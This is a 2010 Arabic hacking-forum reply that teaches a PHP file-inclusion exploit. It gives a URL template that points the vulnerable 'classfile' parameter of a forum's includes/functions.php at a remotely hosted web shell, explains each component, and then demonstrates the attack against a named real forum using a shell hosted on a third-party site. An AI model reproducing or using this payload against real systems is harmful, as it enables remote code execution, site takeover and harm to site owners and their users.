عرض مشاركة واحدة
قديم 08-05-2010, 05:37 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
ViRuS Qalaa
iraQi HackerS
 
الصورة الرمزية ViRuS Qalaa
 

 

 
إحصائية العضو







ViRuS Qalaa غير متواجد حالياً

إرسال رسالة عبر MSN إلى ViRuS Qalaa

 

 

إحصائية الترشيح

عدد النقاط : 10
ViRuS Qalaa is on a distinguished road

افتراضي


[align=center]شكرا لك على الثغرة بارك الله فيك بلنسبة الاخوان هاكر مغربي & hacker's king
الاستغلال مايراد لة شرح طويل فهوا بسيط جدا راح اطبق على الاستغلال الثاني ولاستغلال الاول اخي غلط لانك ماواضع المتغير المصاب بعد علامة الاستفهام يرجى اعادة كتابة الاستغلال
الاستغلال الثاني : هو استغلال لثغرة الفايل انكود lfi

كود PHP:
http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt? 
http//www.site.com<<< الموقع المستهدف
[path]<<< المجلد الموجد فية المنتدى
includes/functions.php<<<مسار الملف المصاب
?<<<اشارة الاستفهام التي تكون قبل المتغير المصاب
classfile<<< المتغير المصاب
[shell].txt?<<<رابط الشل بصيغة txt وبعدة علامة الاستفهام

وراح اطبق لكم على المنتدى العناكب ههههه الاستغلال

كود PHP:
www.vbspiders.com/vb/includes/functions.php?classfile=http://www.e-linux-solutions.com/descargas/data.txt? 
اتمنى ان تكونوا فهمت الاستغلال

تحياتي لكم [/align]
التوقيع

12 My Twelve Imams


Good Bye VbSpiders
I'll Back
Si
gn Out

 

   

رد مع اقتباس